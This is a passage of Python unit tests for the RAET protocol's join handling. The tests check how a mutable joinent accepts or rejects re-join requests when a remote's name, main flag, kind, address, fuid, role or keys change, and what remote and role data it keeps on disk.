    self.join(beta, alpha, deid=betaRemote.nuid)
    # Re-reject after the join updated the remote under the new role
    alpha.keep.rejectRemote(alphaRemote)
    # Action: Reject, don't clear (one transaction left pending on each side)
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 1)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertIs(remote.joined, None)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # alphaRemote was mutated: role changed, so neither sameAll nor sameRoleKeys
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.role, newRole)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIsNot(remoteData, None)
    self.assertEqual(remoteData['role'], beta.local.role)
    self.assertEqual(remoteData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(remoteData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(remoteData['pubhex']), beta.local.priver.pubhex)
    # Check role/keys dump: both old and new role entries exist and are rejected
    roleData = alpha.keep.loadRemoteRoleData(oldRole)
    self.assertEqual(roleData['role'], oldRole)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
    self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
    roleData = alpha.keep.loadRemoteRoleData(newRole)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), alphaRemote.verfer.keyhex)
    self.assertEqual(ns2b(roleData['pubhex']), alphaRemote.pubber.keyhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousRejectedRejectSameAll(self):
    '''
    Test joinent rejects non-vacuous join request with same all from already rejected estate (J1)

    Beta re-joins with identical data after its role was rejected on alpha;
    alpha rejects, removes the in-memory remote, and clears its remote dump
    while keeping the rejected role/keys on disk.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousRejectedRejectSameAll.__doc__))
    # Mode: Never, Once
    alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
    # Mutable: Either
    alpha.mutable = True
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0,  # always 0 for join
                                       ha=alpha.local.ha)
    # Ephemeral: No Nuid (the Nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    # Status: Rejected
    alpha.keep.rejectRemote(alphaRemote)
    # Ensure remote role is rejected
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Name: Old
    # Main: Old
    # Kind: Old
    # RHA: Old
    # Nuid: Old
    # Fuid: Old
    # Leid: Old
    # Reid: Old
    # Role: Old
    # Keys: Old
    # Sameness: SameAll
    # Join with same all
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Reject, Remove Clear (beta is left with a pending transaction)
    self.assertEqual(len(alpha.transactions), 0)
    self.assertEqual(len(alpha.remotes), 0)
    self.assertEqual(len(alpha.nameRemotes), 0)
    self.assertEqual(len(beta.transactions), 1)
    self.assertEqual(len(beta.remotes), 1)
    self.assertEqual(len(beta.nameRemotes), 1)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert remote is cleared
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    # Assert role/keys aren't touched
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousRejectedRejectSameRoleKeys(self):
    '''
    Test joinent rejects non-vacuous join request with same role/keys from already rejected estate (J2)

    Beta changes a non-role/key attribute (main) but keeps the rejected
    role/keys; alpha rejects, clears the remote dump, and leaves the
    rejected role data untouched.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousRejectedRejectSameRoleKeys.__doc__))
    # Mode: Never, Once
    alpha, beta = self.bootstrapStacks(autoMode=raeting.AutoMode.never.value)
    # Mutable: Yes
    alpha.mutable = True
    # Vacuous: No
    betaRemote = estating.RemoteEstate(stack=beta,
                                       fuid=0,
                                       sid=0,  # always 0 for join
                                       ha=alpha.local.ha)
    # Ephemeral: No Nuid (the Nuid is known)
    alphaRemote = estating.RemoteEstate(stack=alpha,
                                        fuid=betaRemote.nuid,
                                        ha=beta.local.ha,
                                        name=beta.name,
                                        verkey=beta.local.signer.verhex,
                                        pubkey=beta.local.priver.pubhex)
    betaRemote.fuid = alphaRemote.nuid
    alpha.addRemote(alphaRemote)
    beta.addRemote(betaRemote)
    # Status: Rejected
    alpha.keep.rejectRemote(alphaRemote)
    # Ensure remote role is rejected
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Name: Either
    # Main: Either — flip main so the remote is not sameall
    self.assertIs(beta.main, None)
    beta.main = True
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Old
    # Keys: Old
    # Sameness: Same Role/Keys
    # Join with same role/keys
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Reject, clear remote data, don't touch role data
    self.assertEqual(len(alpha.transactions), 0)
    self.assertEqual(len(alpha.remotes), 0)
    self.assertEqual(len(alpha.nameRemotes), 0)
    self.assertEqual(len(beta.transactions), 1)
    self.assertEqual(len(beta.remotes), 1)
    self.assertEqual(len(beta.nameRemotes), 1)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert remote is cleared
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    self.assertIs(remoteData, None)
    # Assert role/keys aren't touched
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.rejected.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewName(self):
    '''
    Test mutable joinent accept non-vacuous join with an updated name (K1)

    After an auto-accepted join, beta renames itself and re-joins; mutable
    alpha accepts, updates the remote's name, and re-dumps it under the
    new name while role/keys stay unchanged.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewName.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    # Vacuous: No
    # Ephemeral: No Nuid (the Nuid is known)
    # Perform an auto-accepted join
    alpha, beta = self.bootstrapJoinedRemotes()
    # list() so indexing works on Python 3 dict views as well as Python 2 lists
    alphaRemote = list(alpha.remotes.values())[0]
    betaRemote = list(beta.remotes.values())[0]
    # Mutable: Yes
    alpha.mutable = True
    # Name: New
    oldName = beta.name
    newName = '{0}_new'.format(oldName)
    beta.name = newName
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not SameAll
    keep = self.copyData(alphaRemote)
    # Ensure remote role is accepted
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Accept, Dump
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified (name changed, role/keys preserved)
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.name, newName)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 2)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 2)
    # Check remote dump: old name cleared, new name present
    remoteData = alpha.keep.loadRemoteData(oldName)
    self.assertIs(remoteData, None)
    remoteData = alpha.keep.loadRemoteData(newName)
    remoteData['ha'] = tuple(remoteData['ha'])
    # Assert updated alphaRemote is dumped
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewMain(self):
    '''
    Test mutable joinent accept non-vacuous join with an updated main (K2)

    After an auto-accepted join, beta flips its main flag and re-joins;
    mutable alpha accepts, updates the remote's main, and re-dumps it.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewMain.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    # Vacuous: No
    # Ephemeral: No Nuid (the Nuid is known)
    # Perform an auto-accepted join
    alpha, beta = self.bootstrapJoinedRemotes()
    # list() so indexing works on Python 3 dict views as well as Python 2 lists
    alphaRemote = list(alpha.remotes.values())[0]
    betaRemote = list(beta.remotes.values())[0]
    # Mutable: Yes
    alpha.mutable = True
    oldMain = None
    newMain = True
    # Name: Either
    # Main: New
    self.assertIs(beta.main, oldMain)
    beta.main = newMain
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not SameAll
    keep = self.copyData(alphaRemote)
    # Ensure remote role is accepted
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Accept, Dump
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified (main changed, role/keys preserved)
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
    self.assertIs(alphaRemote.main, newMain)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 2)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 2)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.name)
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewKind(self):
    '''
    Test mutable joinent accept non-vacuous join with an updated kind (K3)

    After an auto-accepted join, beta changes its kind and re-joins;
    mutable alpha accepts, updates the remote's kind, and re-dumps it.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewKind.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    # Vacuous: No
    # Ephemeral: No Nuid (the Nuid is known)
    # Perform an auto-accepted join
    alpha, beta = self.bootstrapJoinedRemotes()
    # list() so indexing works on Python 3 dict views as well as Python 2 lists
    alphaRemote = list(alpha.remotes.values())[0]
    betaRemote = list(beta.remotes.values())[0]
    # Mutable: Yes
    alpha.mutable = True
    oldKind = beta.kind
    newKind = oldKind + 10
    # Name: Either
    # Main: Either
    # Kind: New
    beta.kind = newKind
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not SameAll
    keep = self.copyData(alphaRemote)
    # Ensure remote role is accepted
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Accept, Dump
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified (kind changed, role/keys preserved)
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
    self.assertIs(alphaRemote.kind, newKind)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 2)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 2)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.name)
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewRha(self):
    '''
    Test mutable joinent accept non-vacuous join with an updated remote host address (K4)

    After an auto-accepted join, beta rebinds its server to a new port and
    re-joins; mutable alpha accepts, updates the remote's ha, and re-dumps it.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewRha.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    # Vacuous: No
    # Ephemeral: No Nuid (the Nuid is known)
    # Perform an auto-accepted join
    alpha, beta = self.bootstrapJoinedRemotes()
    # list() so indexing works on Python 3 dict views as well as Python 2 lists
    alphaRemote = list(alpha.remotes.values())[0]
    betaRemote = list(beta.remotes.values())[0]
    # Mutable: Yes
    alpha.mutable = True
    # Name: Either
    # Main: Either
    # Kind: Either
    # RHA: New
    oldHa = beta.local.ha
    newHa = (beta.local.ha[0], 7532)
    self.assertNotEqual(oldHa, newHa)
    # update beta HA
    beta.server.close()
    beta.ha = newHa
    beta.local.ha = newHa
    # recreate beta server socket on the new address
    beta.server = beta.serverFromLocal()
    reopenResult = beta.server.reopen()
    self.assertTrue(reopenResult)
    self.assertEqual(beta.server.ha, newHa)
    self.assertEqual(beta.local.ha, newHa)
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Either
    # Keys: Either
    # Sameness: Not SameAll
    keep = self.copyData(alphaRemote)
    # Ensure remote role is accepted
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Accept, Dump
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified (ha changed, role/keys preserved)
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.ha, newHa)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 2)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 2)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewFuid(self):
    '''
    Test mutable joinent accept non-vacuous join with an updated fuid (K5)

    Beta's remote gets a new nuid (seen as a new fuid/reid by alpha) and
    re-joins; mutable alpha accepts, updates the remote's fuid, and
    re-dumps it.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewFuid.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    # Vacuous: No
    # Ephemeral: No Nuid (the Nuid is known)
    # Perform an auto-accepted join
    alpha, beta = self.bootstrapJoinedRemotes()
    # list() so indexing works on Python 3 dict views as well as Python 2 lists
    alphaRemote = list(alpha.remotes.values())[0]
    betaRemote = list(beta.remotes.values())[0]
    # Mutable: Yes
    alpha.mutable = True
    # Name: Either
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: New — rekey betaRemote under a new nuid in beta's remotes map
    oldFuid = betaRemote.nuid
    newFuid = oldFuid + 10
    betaRemote.nuid = newFuid
    beta.remotes[newFuid] = beta.remotes[oldFuid]
    del beta.remotes[oldFuid]
    # Leid: Old
    # Reid: New
    # Role: Either
    # Keys: Either
    # Sameness: Not SameAll
    keep = self.copyData(alphaRemote)
    # Ensure remote role is accepted
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Accept, Dump
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified (fuid changed, role/keys preserved)
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertTrue(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.fuid, newFuid)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 2)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 2)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewRole(self):
    '''
    Test mutable joinent accept non-vacuous join with an updated role (K6)

    After an auto-accepted join, beta changes its role name and re-joins;
    mutable alpha accepts, updates the remote's role, and dumps role data
    under the new role name.
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewRole.__doc__))
    # Status: Accepted (auto accept keys)
    # Mode: Never, Once, Always
    # Vacuous: No
    # Ephemeral: No Nuid (the Nuid is known)
    # Perform an auto-accepted join
    alpha, beta = self.bootstrapJoinedRemotes()
    # list() so indexing works on Python 3 dict views as well as Python 2 lists
    alphaRemote = list(alpha.remotes.values())[0]
    betaRemote = list(beta.remotes.values())[0]
    # Mutable: Yes
    alpha.mutable = True
    # Name: Either
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: New
    oldRole = 'beta'
    newRole = 'beta_new'
    self.assertIs(beta.local.role, oldRole)
    beta.local.role = newRole
    beta.dumpLocalRole()
    # Keys: Either
    # Sameness: Not SameAll, Not Same Role/Keys
    keep = self.copyData(alphaRemote)
    # Ensure remote role is accepted
    roleData = alpha.keep.loadRemoteRoleData(oldRole)
    self.assertEqual(roleData['role'], oldRole)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Ensure alpha knows nothing about the new role
    roleData = alpha.keep.loadRemoteRoleData(newRole)
    self.assertEqual(roleData['role'], newRole)
    self.assertIs(roleData['acceptance'], None)
    self.assertIs(roleData['verhex'], None)
    self.assertIs(roleData['pubhex'], None)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Accept, Dump
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified (role changed, so role/keys differ too)
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
    self.assertEqual(alphaRemote.role, newRole)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 2)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 2)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump under the new role
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousAcceptNewKeys(self):
    '''
    Test mutable joinent accept non-vacuous join with an updated keys (K7)
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptNewKeys.__doc__))
    # Scenario K7: alpha (joinent) is mutable and auto-accepting; beta rejoins
    # with freshly generated signing/encryption keys but the same role.
    # Expected: alpha accepts and dumps the new keys for beta's role.
    # Status: Accepted (auto accept keys)
    # Vacuous: No
    # Ephemeral: No Nuid (the Nuid is known)
    # Perform an auto-accepted join
    alpha, beta = self.bootstrapJoinedRemotes()
    # NOTE: .values()[0] relies on an indexable odict (ioflo), not a plain dict
    alphaRemote = alpha.remotes.values()[0]
    betaRemote = beta.remotes.values()[0]
    # Ensure remote role is accepted
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertIs(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    # Mode: Always
    alpha.keep.auto = raeting.AutoMode.always.value
    # Mutable: Yes
    alpha.mutable = True
    # Name: Either
    # Main: Either
    # Kind: Either
    # RHA: Either
    # Nuid: Old
    # Fuid: Either
    # Leid: Old
    # Reid: Either
    # Role: Old
    # Keys: New
    # Regenerate beta's key pairs so the rejoin presents new keys for the old role
    beta.local.signer = nacling.Signer()
    beta.local.priver = nacling.Privateer()
    beta.dumpLocalRole()
    # Sameness: Not SameAll, Not Same Role/Keys
    keep = self.copyData(alphaRemote)
    # Test
    self.join(beta, alpha, deid=betaRemote.nuid)
    # Action: Accept, Dump
    for stack in [alpha, beta]:
        self.assertEqual(len(stack.transactions), 0)
        self.assertEqual(len(stack.remotes), 1)
        self.assertEqual(len(stack.nameRemotes), 1)
        for remote in stack.remotes.values():
            self.assertTrue(remote.joined)
            self.assertIs(remote.allowed, None)
            self.assertIs(remote.alived, None)
            self.assertIs(remote.acceptance, raeting.Acceptance.accepted.value)
    self.assertTrue(alpha.mutable)
    self.assertIs(beta.mutable, None)
    # Assert alphaRemote is modified
    self.assertFalse(self.sameAll(alphaRemote, keep))
    self.assertFalse(self.sameRoleKeys(alphaRemote, keep))
    # Alpha's cached verification/encryption keys must now match beta's new pairs
    self.assertEqual(alphaRemote.verfer.keyhex, beta.local.signer.verhex)
    self.assertEqual(alphaRemote.pubber.keyhex, beta.local.priver.pubhex)
    # Second completed join on each side (first was in bootstrapJoinedRemotes)
    self.assertIn('join_correspond_complete', alpha.stats)
    self.assertEqual(alpha.stats['join_correspond_complete'], 2)
    self.assertIn('join_initiate_complete', beta.stats)
    self.assertEqual(beta.stats['join_initiate_complete'], 2)
    # Check remote dump
    remoteData = alpha.keep.loadRemoteData(beta.local.name)
    # keep serializes ha as a list; sameAll compares against the tuple form
    remoteData['ha'] = tuple(remoteData['ha'])
    self.assertTrue(self.sameAll(alphaRemote, remoteData))
    # Check role/keys dump
    roleData = alpha.keep.loadRemoteRoleData(beta.local.role)
    self.assertEqual(roleData['acceptance'], raeting.Acceptance.accepted.value)
    self.assertEqual(roleData['role'], beta.local.role)
    self.assertEqual(ns2b(roleData['verhex']), beta.local.signer.verhex)
    self.assertEqual(ns2b(roleData['pubhex']), beta.local.priver.pubhex)
    for stack in [alpha, beta]:
        stack.server.close()
        stack.clearAllKeeps()
def testJoinentNonVacuousAcceptSameAll(self):
    '''
    Test joinent accept non-vacuous same all join (L1)
    '''
    console.terse("{0}\n".format(self.testJoinentNonVacuousAcceptSameAll.__doc__))
